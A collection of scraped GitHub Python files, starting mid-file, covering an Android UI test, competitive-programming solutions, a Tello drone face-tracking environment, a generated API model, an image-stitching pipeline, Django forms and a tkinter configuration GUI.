driver.swipe(700,500,100,500,1000)\n# driver.swipe(700,500,100,500,1000)\n# driver.swipe(700,500,100,500,1000)\n# driver.swipe(700,500,100,500,1000)\nsleep(2)\n# driver.swipe(700,500,100,500,1000)\ndriver.find_element_by_class_name('android.widget.Button').click()\nsleep(2)\n# driver.find_element_by_id('com.ihimee.bwqs:id/main_tab_settings').click()\nsleep(2)\n#登陆\ndriver.find_element_by_id('com.ihimee.bwqs:id/username_edit').send_keys('zhangkairui1 ')\ndriver.find_element_by_id('com.ihimee.bwqs:id/password_edit').send_keys('123456')\ndriver.find_element_by_id('com.ihimee.bwqs:id/login_btn').click()\nsleep(5)\n#学习模块\ndriver.find_element_by_('com.ihimee.bwqs:id/bottom_nav_icon').click()\nsleep(3)\n#确认按钮\ndriver.find_element_by_id('com.ihimee.bwqs:id/sure_btn').click()\nsleep(2)\ndriver.find_elements_by_class_name('android.widget.RelativeLayout')[0].click()\nsleep(5)\ndriver.find_elements_by_class_name('android.widget.RelativeLayout')[9].click()\nsleep(2)\n# driver.swipe(500,1000,500,100,1000)\n# driver.swipe(500,1000,500,100,1000)\ndriver.swipe(size['width']*0.3,size['height']*0.8,size['width']*0.3,size['height']*0.3,1000)\nsleep(2)\ndriver.tap([(114,1633)])\nsleep(10)\ndriver.tap([(114,1633)])\nsleep(2)\ndriver.find_element_by_id('com.ihimee.bwqs:id/topbar_left_view_btn').click()\nsleep(2)\ndriver.find_element_by_id('com.ihimee.bwqs:id/topbar_left_view_btn').click()\ndriver.find_element_by_id('com.ihimee.bwqs:id/main_tab_settings').click()\na=driver.find_element_by_id('com.ihimee.bwqs:id/user_name').text\nb='张凯瑞zhangkairui'\nif a==b:\n print('pass')\nelse:\n print('fail')\ndriver.quit()","repo_name":"jay521github/Douglas","sub_path":"OnLine/Test/qiangshao.py","file_name":"qiangshao.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"31311983936","text":"class Solution:\n def nearestValidPoint(self, x: int, y: int, points: List[List[int]]) -> int:\n \"\"\"\n i will go through the points in points :\n - then find out whether they are valid or not by compairing their x and y\n - then when ever we find valid calculate their manhattan distance then \n - pair the manhatten distance with index number in a tuple and save it ia a list\n - sort the list based on manhatan distance \n - return the first manhatan distance index\n \"\"\"\n store = []\n for idx in range(len(points)):\n if (points[idx])[0] == x or (points[idx])[1]==y: # then they are valid\n manhatan_distance = (abs((points[idx])[0] - x))+(abs((points[idx])[1]-y))\n store.append((manhatan_distance, idx))\n print(store)\n store = sorted(store, key = lambda item: item[0])\n print(store)\n if store:\n return store[0][1]\n return -1","repo_name":"ruth987/Competitve-programming-A2SV","sub_path":"1779-find-nearest-point-that-has-the-same-x-or-y-coordinate/1779-find-nearest-point-that-has-the-same-x-or-y-coordinate.py","file_name":"1779-find-nearest-point-that-has-the-same-x-or-y-coordinate.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"29402826221","text":"## https://atcoder.jp/contests/atc001/tasks/dfs_a\n\nimport sys\nsys.setrecursionlimit(10000000)\n\nH,W = map(int,input().split())\nc = [list(input()) for i in range(H)]\nfor i in range(H):\n for j in range(W):\n if c[i][j] == \"s\":\n s = (i,j)\n elif c[i][j] == \"g\":\n t = (i,j)\n\n#始点(i,j)から始まるdfs\nseen = [[False]*W for i in range(H)]\ndef dfs(i,j):\n seen[i][j] = True\n\n if 0<=i+1<=H-1 and 0<=j<=W-1 and c[i+1][j] != \"#\":\n if not seen[i+1][j]:\n dfs(i+1,j)\n if 0<=i-1<=H-1 and 0<=j<=W-1 and c[i-1][j] != \"#\":\n if not seen[i-1][j]:\n dfs(i-1,j)\n if 0<=i<= H-1 and 0<=j+1<=W-1 and c[i][j+1] != \"#\":\n if not seen[i][j+1]:\n dfs(i,j+1)\n if 0<=i<=H-1 and 0<=j-1<=W-1 and c[i][j-1] != \"#\":\n if not seen[i][j-1]:\n dfs(i,j-1)\n\ndfs(s[0],s[1])\nif seen[t[0]][t[1]]:\n print(\"Yes\")\nelse:\n print(\"No\")\n\n\n","repo_name":"Yoshifumi-Nakano/atcoder","sub_path":"algorithm/graph_s-t_path.py","file_name":"graph_s-t_path.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"2911894516","text":"from djitellopy import Tello\nimport time\nimport cv2\nimport numpy as np\nfrom aigym import box, seeding\n\n\nclass Drone:\n def __init__(self):\n self.me = Tello()\n self.me.connect()\n self.me.front_back_velocity = 0\n self.me.left_right_velocity = 0\n self.me.up_down_velocity = 0\n self.face_cascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\n self.eyes_cascade = cv2.CascadeClassifier(\"haarcascade_eye.xml\")\n self.me.yaw_velocity = 0\n self.me.speed = 0\n print(self.me.get_battery())\n self.me.streamoff()\n self.me.streamon()\n self.me.takeoff()\n #self.me.move_up(50)\n\n self.width = 500\n self.height = 500\n self.hei_hf = int(self.height / 9)\n self.state = None\n self.maxspeed = 40\n cv2.waitKey(1)\n print('initialized')\n self.steps_beyond_done = None\n self.observation_space = box.Box(0, 1, shape=(3,), dtype=np.float32)\n self.action_space = box.Box(-1, +1, (3,), dtype=np.float32)\n\n def step(self, action):\n reward = 0\n action = np.clip(action, -1, +1).astype(np.float32)\n prev_x, prev_y, prev_w = self.state\n prev_x = prev_x * self.width\n prev_y = prev_y * self.width\n prev_w = prev_w * self.width\n cv2.waitKey(1)\n\n prev_rem_x = self.width - (prev_x + prev_w)\n prev_diff_x = abs(prev_x - prev_rem_x)\n\n prev_rem_y = self.width - (prev_y + prev_w)\n prev_diff_y = abs(prev_y - prev_rem_y)\n\n curr_w = 0\n curr_y = 0\n curr_x = 0\n done = False\n # print('action', action)\n self.me.send_rc_control(int(action[0] * self.maxspeed), int(action[1] * self.maxspeed),\n int(action[2] * self.maxspeed), 0)\n frame_read = self.me.get_frame_read()\n img = frame_read.frame\n img = cv2.resize(img, (self.width, self.height))\n faces = self.face_cascade.detectMultiScale(img)\n for (x, y, w, h) in faces:\n nframe = img[y:y + h, x:x + w]\n eyes = self.eyes_cascade.detectMultiScale(nframe)\n if len(eyes) > 1:\n # print('state', (x, y, w, h))\n\n curr_w = w\n curr_x = x\n curr_y = y\n self.state = (x / self.width, y / self.width, w / self.width)\n break\n else:\n done = True\n reward = reward - 10.0\n\n if not done:\n rem = self.width - (curr_x + curr_w)\n diff_x = abs(curr_x - rem)\n\n remy = self.width - (curr_y + curr_w)\n diff_y = abs(curr_y - remy)\n\n if (abs(curr_w - int(self.width / 5)) <= 10) and (diff_y < 30) and (diff_x < 30):\n # acceptable range width - (115, 135); y = 50,115;\n # print('perfect')\n reward = reward + 10.0\n else:\n # print('diff', diff)\n if (diff_x > 30) and (diff_x < prev_diff_x):\n reward = reward + (0.003 * (self.width - diff_x))\n elif (diff_y > 30) and (diff_y < prev_diff_y):\n reward = reward + (0.001 * (self.width - diff_y))\n elif curr_w - int(self.width / 5) > 10:\n if curr_w < prev_w:\n reward = reward + 0.2\n else:\n reward = reward - 0.2\n\n return np.array(self.state), reward, done, {}\n\n def render(self, mode='human'):\n cv2.waitKey(1)\n frame_read = self.me.get_frame_read()\n img = frame_read.frame\n img = cv2.resize(img, (self.width, self.height))\n cv2.rectangle(img, (int(self.state[0] * self.width), int(self.state[1] * self.width)), (\n int(self.state[0] * self.width) + int(self.state[2] * self.width),\n int(self.state[1] * self.width) + int(self.state[2] * self.width)),\n (0, 255, 0), 3)\n cv2.imshow('Frame', img)\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def reset(self):\n self.me.send_rc_control(0, 0, 0, 0)\n cv2.waitKey(1)\n\n while True:\n frame_read = self.me.get_frame_read()\n img = frame_read.frame\n img = cv2.resize(img, (self.width, self.height))\n faces = self.face_cascade.detectMultiScale(img)\n # print('faces', faces)\n cv2.waitKey(1)\n if len(faces) > 0:\n (x, y, w, h) = faces[0]\n nframe = img[y:y + h, x:x + w]\n\n eyes = self.eyes_cascade.detectMultiScale(nframe)\n\n if len(eyes) > 1:\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 3)\n self.me.send_rc_control(0, 0, 0, 0)\n self.state = (x / self.width, y / self.width, w / self.width)\n break\n self.me.send_rc_control(0, 0, 0, 30)\n cv2.imshow('Frame', img)\n\n return np.array(self.state)\n\n def close(self):\n self.me.land()\n cv2.destroyAllWindows()\n","repo_name":"SwapnilMad/Autonomous-Face-Tracking-Drone","sub_path":"drone.py","file_name":"drone.py","file_ext":"py","file_size_in_byte":5199,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"70"}
+{"seq_id":"18478658205","text":"# coding: utf-8\n\"\"\"\n Amphora Data\n\n Connect information in real time with Amphora Data. Learn more at https://docs.amphoradata.com # noqa: E501\n\n The version of the OpenAPI document: 0.10.29\n Generated by: https://openapi-generator.tech\n\"\"\"\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom amphora_api_client.configuration import Configuration\n\n\nclass Address(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'street_number': 'str',\n 'street_name': 'str',\n 'municipality_subdivision': 'str',\n 'municipality': 'str',\n 'country_secondary_subdivision': 'str',\n 'country_subdivision': 'str',\n 'postal_code': 'str',\n 'country_code': 'str',\n 'country': 'str',\n 'country_code_iso3': 'str',\n 'freeform_address': 'str',\n 'local_name': 'str'\n }\n\n attribute_map = {\n 'street_number': 'streetNumber',\n 'street_name': 'streetName',\n 'municipality_subdivision': 'municipalitySubdivision',\n 'municipality': 'municipality',\n 'country_secondary_subdivision': 'countrySecondarySubdivision',\n 'country_subdivision': 'countrySubdivision',\n 'postal_code': 'postalCode',\n 'country_code': 'countryCode',\n 'country': 'country',\n 'country_code_iso3': 'countryCodeIso3',\n 'freeform_address': 'freeformAddress',\n 'local_name': 'localName'\n }\n\n def __init__(self,\n street_number=None,\n street_name=None,\n municipality_subdivision=None,\n municipality=None,\n country_secondary_subdivision=None,\n country_subdivision=None,\n postal_code=None,\n country_code=None,\n country=None,\n country_code_iso3=None,\n freeform_address=None,\n local_name=None,\n local_vars_configuration=None): # noqa: E501\n \"\"\"Address - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._street_number = None\n self._street_name = None\n self._municipality_subdivision = None\n self._municipality = None\n self._country_secondary_subdivision = None\n self._country_subdivision = None\n self._postal_code = None\n self._country_code = None\n self._country = None\n self._country_code_iso3 = None\n self._freeform_address = None\n self._local_name = None\n self.discriminator = None\n\n self.street_number = street_number\n self.street_name = street_name\n self.municipality_subdivision = municipality_subdivision\n self.municipality = municipality\n self.country_secondary_subdivision = country_secondary_subdivision\n self.country_subdivision = country_subdivision\n self.postal_code = postal_code\n self.country_code = country_code\n self.country = country\n self.country_code_iso3 = country_code_iso3\n self.freeform_address = freeform_address\n self.local_name = local_name\n\n @property\n def street_number(self):\n \"\"\"Gets the street_number of this Address. # noqa: E501\n\n\n :return: The street_number of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._street_number\n\n @street_number.setter\n def street_number(self, street_number):\n \"\"\"Sets the street_number of this Address.\n\n\n :param street_number: The street_number of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._street_number = street_number\n\n @property\n def street_name(self):\n \"\"\"Gets the street_name of this Address. # noqa: E501\n\n\n :return: The street_name of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._street_name\n\n @street_name.setter\n def street_name(self, street_name):\n \"\"\"Sets the street_name of this Address.\n\n\n :param street_name: The street_name of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._street_name = street_name\n\n @property\n def municipality_subdivision(self):\n \"\"\"Gets the municipality_subdivision of this Address. # noqa: E501\n\n\n :return: The municipality_subdivision of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._municipality_subdivision\n\n @municipality_subdivision.setter\n def municipality_subdivision(self, municipality_subdivision):\n \"\"\"Sets the municipality_subdivision of this Address.\n\n\n :param municipality_subdivision: The municipality_subdivision of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._municipality_subdivision = municipality_subdivision\n\n @property\n def municipality(self):\n \"\"\"Gets the municipality of this Address. # noqa: E501\n\n\n :return: The municipality of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._municipality\n\n @municipality.setter\n def municipality(self, municipality):\n \"\"\"Sets the municipality of this Address.\n\n\n :param municipality: The municipality of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._municipality = municipality\n\n @property\n def country_secondary_subdivision(self):\n \"\"\"Gets the country_secondary_subdivision of this Address. # noqa: E501\n\n\n :return: The country_secondary_subdivision of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._country_secondary_subdivision\n\n @country_secondary_subdivision.setter\n def country_secondary_subdivision(self, country_secondary_subdivision):\n \"\"\"Sets the country_secondary_subdivision of this Address.\n\n\n :param country_secondary_subdivision: The country_secondary_subdivision of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._country_secondary_subdivision = country_secondary_subdivision\n\n @property\n def country_subdivision(self):\n \"\"\"Gets the country_subdivision of this Address. # noqa: E501\n\n\n :return: The country_subdivision of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._country_subdivision\n\n @country_subdivision.setter\n def country_subdivision(self, country_subdivision):\n \"\"\"Sets the country_subdivision of this Address.\n\n\n :param country_subdivision: The country_subdivision of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._country_subdivision = country_subdivision\n\n @property\n def postal_code(self):\n \"\"\"Gets the postal_code of this Address. # noqa: E501\n\n\n :return: The postal_code of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._postal_code\n\n @postal_code.setter\n def postal_code(self, postal_code):\n \"\"\"Sets the postal_code of this Address.\n\n\n :param postal_code: The postal_code of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._postal_code = postal_code\n\n @property\n def country_code(self):\n \"\"\"Gets the country_code of this Address. # noqa: E501\n\n\n :return: The country_code of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._country_code\n\n @country_code.setter\n def country_code(self, country_code):\n \"\"\"Sets the country_code of this Address.\n\n\n :param country_code: The country_code of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._country_code = country_code\n\n @property\n def country(self):\n \"\"\"Gets the country of this Address. # noqa: E501\n\n\n :return: The country of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._country\n\n @country.setter\n def country(self, country):\n \"\"\"Sets the country of this Address.\n\n\n :param country: The country of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._country = country\n\n @property\n def country_code_iso3(self):\n \"\"\"Gets the country_code_iso3 of this Address. # noqa: E501\n\n\n :return: The country_code_iso3 of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._country_code_iso3\n\n @country_code_iso3.setter\n def country_code_iso3(self, country_code_iso3):\n \"\"\"Sets the country_code_iso3 of this Address.\n\n\n :param country_code_iso3: The country_code_iso3 of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._country_code_iso3 = country_code_iso3\n\n @property\n def freeform_address(self):\n \"\"\"Gets the freeform_address of this Address. # noqa: E501\n\n\n :return: The freeform_address of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._freeform_address\n\n @freeform_address.setter\n def freeform_address(self, freeform_address):\n \"\"\"Sets the freeform_address of this Address.\n\n\n :param freeform_address: The freeform_address of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._freeform_address = freeform_address\n\n @property\n def local_name(self):\n \"\"\"Gets the local_name of this Address. # noqa: E501\n\n\n :return: The local_name of this Address. # noqa: E501\n :rtype: str\n \"\"\"\n return self._local_name\n\n @local_name.setter\n def local_name(self, local_name):\n \"\"\"Sets the local_name of this Address.\n\n\n :param local_name: The local_name of this Address. # noqa: E501\n :type: str\n \"\"\"\n\n self._local_name = local_name\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(\n map(lambda x: x.to_dict()\n if hasattr(x, \"to_dict\") else x, value))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(\n map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, Address):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, Address):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"amphoradata/python-sdk","sub_path":"src/sdk/amphora_api_client/models/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":11719,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"41024914882","text":"import sys\nimport os\nimport re\nfrom skimage import io\nfrom skimage.color import rgb2gray\nfrom skimage.external.tifffile import imsave\nimport numpy as np\nimport pandas as pd\nimport image_processing\nimport stitch_cell_centroid\nimport segmentation\n\nif __name__==\"__main__\":\n\n\tprint(\"Extracting info from segmentation Roi zip...\")\n\tfor i in range(0,5):\n\t\tprint(\"Working on position\", i, \"...\")\n\t\timage_processing.extract_roi_zip(\"RoiSet_Pos%d_real.zip\" % i, \"roi/roi.pos%d.all.txt\" % i, tmp_dir=\"/tmp/pos%d\" % i)\n\n\toffset = image_processing.read_offset(\"offset.txt\")\n\n\tprint(\"Decoupling tiff...\")\n\tfor d in range(0,5):\n\t\tprint(\"Working on position\", d, \"...\")\n\t\timage_processing.decouple_tiff(\"segmentation_staining_1_MMStack_Pos%d.ome.tif\" % d, prefix=\"Pos%d\" % d)\n\n\tprint(\"Stitching staining images...\")\n\tfor channel in [0,4,7]:\n\t\tfor i in range(0,5):\n\t\t\timage_processing.rotate(\"Pos%d.%d.tif\" % (i, channel), \"Pos%d.%d.rotate.tif\" % (i, channel))\n\t\ttimage_by_field = {}\n\t\tfor i in range(0,5):\n\t\t\ttimage_by_field[i] = io.imread(\"Pos%d.%d.rotate.tif\" % (i,channel))\n\t\timage_processing.stitch_image(timage_by_field, offset, outfile=\"Pos.ch%d.joined.tif\" % channel)\n\t\n\tXcen, field = stitch_cell_centroid.read_centroid(\"Cell_centroids.csv\")\n\tXcen2 = np.empty(Xcen.shape, dtype=\"float32\")\n\n\tnew_coord = image_processing.rotate_coordinate(Xcen)\n\tfor i in range(Xcen.shape[0]):\n\t\tXcen2[i, :] = new_coord[i]\n\t\n\tprint(\"Stitching expression data...\")\n\tm = image_processing.subset_cell_index(field, FD=[0,1,2,3,4])\n\tfield, Xcen2 = field[m], Xcen2[m]\n\tXcen_new = image_processing.stitch_coord(Xcen2, field, offset)\n\tfw = open(\"cell.centroid.stitched.pos.all.cells.txt\", \"w\")\n\tfor i in range(Xcen_new.shape[0]):\n\t\tfw.write(\"%d,%d,%.1f,%.1f\\n\" % (i+1, 100, Xcen_new[i,0], Xcen_new[i,1]))\n\tfw.close()\n\n\tprint(\"Stitching segmentations...\")\n\tall_coord = segmentation.read_segmentation(\"roi\", field=[0,1,2,3,4])\n\tby_cell = {}\n\tcur = 0\n\tfw = open(\"roi.stitched.pos.all.cells.txt\", \"w\")\n\tfor pos in range(0,5):\n\t\tnum_cell = max([s[0] for s in all_coord[pos]])\n\t\tfor i,x,y in all_coord[pos]:\n\t\t\tnew_x, new_y = image_processing.rotate_coordinate_one(x, y)\n\t\t\tfinal_x, final_y = image_processing.stitch_coord_one(new_x, new_y, pos, offset)\n\t\t\tfw.write(\"%d,%.1f,%.1f\\n\" % (i+cur, final_x, final_y))\n\t\t\tby_cell.setdefault(i+cur, [])\n\t\t\tby_cell[i+cur].append((int(final_x), int(final_y)))\n\t\tcur+=num_cell\n\tfw.close()\n\n\tprint(\"Aligning segmentation to expression data...\")\n\tfw = open(\"segmentation.to.cell.centroid.map.txt\", \"w\")\n\tseg_keys, points = segmentation.get_centroid(by_cell)\n\tnames = [i+1 for i in range(Xcen_new.shape[0])]\n\tpairs = segmentation.match(points, seg_keys, Xcen_new, names)\n\tfor i,j,d in pairs:\n\t\tfw.write(\"pairs %d %d %.3f\\n\" % (i, j, d))\n\tfw.close()\t\n\n\tfor i in [0,4,7]:\n\t\tprint(\"Tiling joined image of channel\", i, \"...\")\n\t\timage_processing.tile(\"Pos.ch%d.joined.tif\" % i, \"imapr26.%d\" % i, \"map\", zoom=6)\n\n\tprint(\"Preparing expression for explorer...\")\n\tmat = pd.read_table(\"cortex_expression_zscore.csv\", sep=\",\", header=0, index_col=0)\n\timage_processing.multilayer_explorer_expression(mat, \"10k.genes\", num_genes_per_file=100)\n\n","repo_name":"TianxiaoNYU/Giotto_viewer","sub_path":"do_all_stitch.py","file_name":"do_all_stitch.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"42351418286","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom .models import *\n\n\n\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\n\nclass ExpenseForm(forms.ModelForm):\n date = forms.DateTimeField(widget=\n forms.widgets.DateTimeInput\n (format='%Y-%m-%d %H:%M', \n attrs={'class':'myDateClass', 'type':'datetime-local'}))\n\n class Meta:\n model = Expense \n fields =('date','ename','eamount','pay_mode','expense_type')\n widgets = {\n 'date': DateInput(),\n }\n \n\n\nclass RegisterForm(UserCreationForm):\n \n class Meta:\n model = User\n fields = [\"username\", \"email\", \"password1\", \"password2\"]\n\n\n def clean_email(self):\n email = self.cleaned_data.get(\"email\")\n if User.objects.filter(email=email).exists():\n print(email, '***********************')\n raise forms.ValidationError(\"Email is not unique\")\n return email\n\n # def clean_email(self):\n # email = self.cleaned_data['email']\n # (first, second,) = email.split(\"@\")\n # (domain, exn,) = second.split(\".\")\n # if domain != \"tmail\":\n # raise forms.ValidationError(\"Domain must be 'tmail'\")\n \n # if User.objects.filter(email=email).exists():\n # print('######################')\n # raise forms.ValidationError(\"Email is alreday registered \")\n\n # return email \n\n\n # def save(self, commit=True):\n # user = super(RegisterForm, self).save(commit=False)\n # user.fullname = self.cleaned_data[\"fullname\"]\n # user.email = self.cleaned_data[\"email\"]\n # if commit:\n # user.save()\n # return user\n\n\n\n\n","repo_name":"suniljokare/Django_Htmx_project","sub_path":"expense/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"44689248862","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tkinter import scrolledtext\nfrom views import *\n\n# 主窗口;\n\nwindow = Tk()\nmonty = ttk.LabelFrame(window)\nwindow.title(\"front_end_test\")\nwindow.resizable(width=False, height=False) # 窗口大小不可改变\nwindow.geometry(\"800x600+650+100\")\n\n# 顶级菜单,显示在窗口最上方\nmenubar = Menu(window)\n\n# fmenu可理解为菜单容器,用于add菜单项\n\nfmenu1 = Menu(window, tearoff=False) # tearoff=True 表示这个菜单可以被拖拽出来\nfmenu1.add_separator() # 分割线\nfmenu1.add_command(label='dvbs_11_dynamic_range_awng_max_level', command=lambda: dvbs_11_dynamic_range_awng_max_level(window, monty))\nfmenu1.add_separator() # 分割线\nfmenu1.add_command(label='dvbs_11_dynamic_range_awng_min_level', command=lambda: dvbs_11_dynamic_range_awng_min_level(window, monty))\nfmenu1.add_separator() # 分割线\nfmenu1.add_command(label='dvbs_12_symbol_rate_step')\nfmenu1.add_separator() # 分割线\nfmenu1.add_command(label='dvbs_15_symbol_err_rate')\nfmenu1.add_separator() # 分割线\nfmenu1.add_command(label='dvbs_16_signal_acquisition_frequency_range')\nfmenu1.add_separator() # 分割线\nfmenu1.add_command(label='dvbs_17_signal_tracking_frequency_range')\n\n\nfmenu2 = Menu(window)\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_18_dynamic_range_awng_max_level')\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_18_dynamic_range_awng_min_level')\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_19_symbol_rate_step')\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_22_phase_distortion_test')\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_23_amplitude_distortion_test')\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_24_symbol_err_rate')\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_25_signal_acquisition_frequency_range')\nfmenu2.add_separator() # 分割线\nfmenu2.add_command(label='dvbs2_26_signal_tracking_frequency_range')\n\n\n\nfmenu3 = Menu(window)\nfmenu3.add_separator()\nfmenu3.add_command(label='菜单3-1')\nfmenu3.add_separator()\nfmenu3.add_command(label='菜单3-2')\n\nfmenu4 = Menu(window) # 创建了第四个菜单容器,add四个菜单容器,实现多级子菜单\nfmenu4_1 = Menu(window)\nfmenu4_1.add_command(label='菜单4-子菜单1-1')\nfmenu4_1.add_command(label='菜单4-子菜单1-2')\nfmenu4_2 = Menu(window)\nfmenu4_2.add_command(label='菜单4-子菜单2-1')\nfmenu4_2.add_command(label='菜单4-子菜单2-2')\nfmenu4_3 = Menu(window)\nfmenu4_3.add_command(label='菜单4-子菜单3-1')\nfmenu4_3.add_command(label='菜单4-子菜单3-2')\nfmenu4_4 = Menu(window)\nfmenu4_4.add_command(label='菜单4-子菜单4-1')\nfmenu4_4.add_command(label='菜单4-子菜单4-2')\n\n# 将fmenu4_1,fmenu4_2,fmenu4_3,fmenu4_4四个菜单容器加入fmenu4菜单容器中\n\nfmenu4.add_cascade(label='菜单4-子菜单1', menu=fmenu4_1)\nfmenu4.add_cascade(label='菜单4-子菜单2', menu=fmenu4_2)\nfmenu4.add_cascade(label='菜单4-子菜单3', menu=fmenu4_3)\nfmenu4.add_cascade(label='菜单4-子菜单4', menu=fmenu4_4)\n\n# 将“fmenu1、fmenu2、fmenu3、fmenu4”四个菜单容器加入顶级菜单中,并设置该菜单容器的label\n\nmenubar.add_cascade(label='DVB-S', menu=fmenu1)\nmenubar.add_cascade(label='DVB-S2', menu=fmenu2)\nmenubar.add_cascade(label='DVB-T', menu=fmenu3)\nmenubar.add_cascade(label='DVB-T2', menu=fmenu4)\n\nwindow['menu'] = menubar # 设置窗口的菜单为menubar\n\nwindow.mainloop()\n","repo_name":"invictus86/front_end_code","sub_path":"ekt_gui/configuration_tool.py","file_name":"configuration_tool.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"24590225226","text":"# 2583번\n\nimport sys\nsys.setrecursionlimit(100000)\n\ndx = [-1, 0, 1, 0]\ndy = [0, -1, 0, 1]\n\nM, N, K = map(int, input().split())\n\nm = [[0] * N for _ in range(M)]\n\n\ndef dfs(x, y):\n # if m[x][y] == 1:\n # return\n global cnt\n m[x][y] = cnt + 1\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if check(nx, ny) and m[nx][ny] == 0:\n\n cnt += 1\n dfs(nx, ny)\n m[nx][ny] = max(cnt, m[nx][ny])\n return cnt\n\n\ndef check(x, y):\n return 0 <= x < M and 0 <= y < N\n\n\nfor _ in range(K):\n x1, y1, x2, y2 = map(int, input().split())\n\n for i in range(y1, y2):\n for j in range(x1, x2):\n # print(i, j)\n m[i][j] = 1\n\nanswer = 0\ncnt = 0\narr = []\nfor i in range(M):\n for j in range(N):\n if m[i][j] == 0:\n\n cnt = 0\n answer += 1\n arr.append(dfs(i, j) + 1)\n\nprint(answer)\narr = sorted(arr)\nfor a in arr:\n print(a, end=' ')\n","repo_name":"lecocococo/Algorithm-PS","sub_path":"DFS/2583.py","file_name":"2583.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
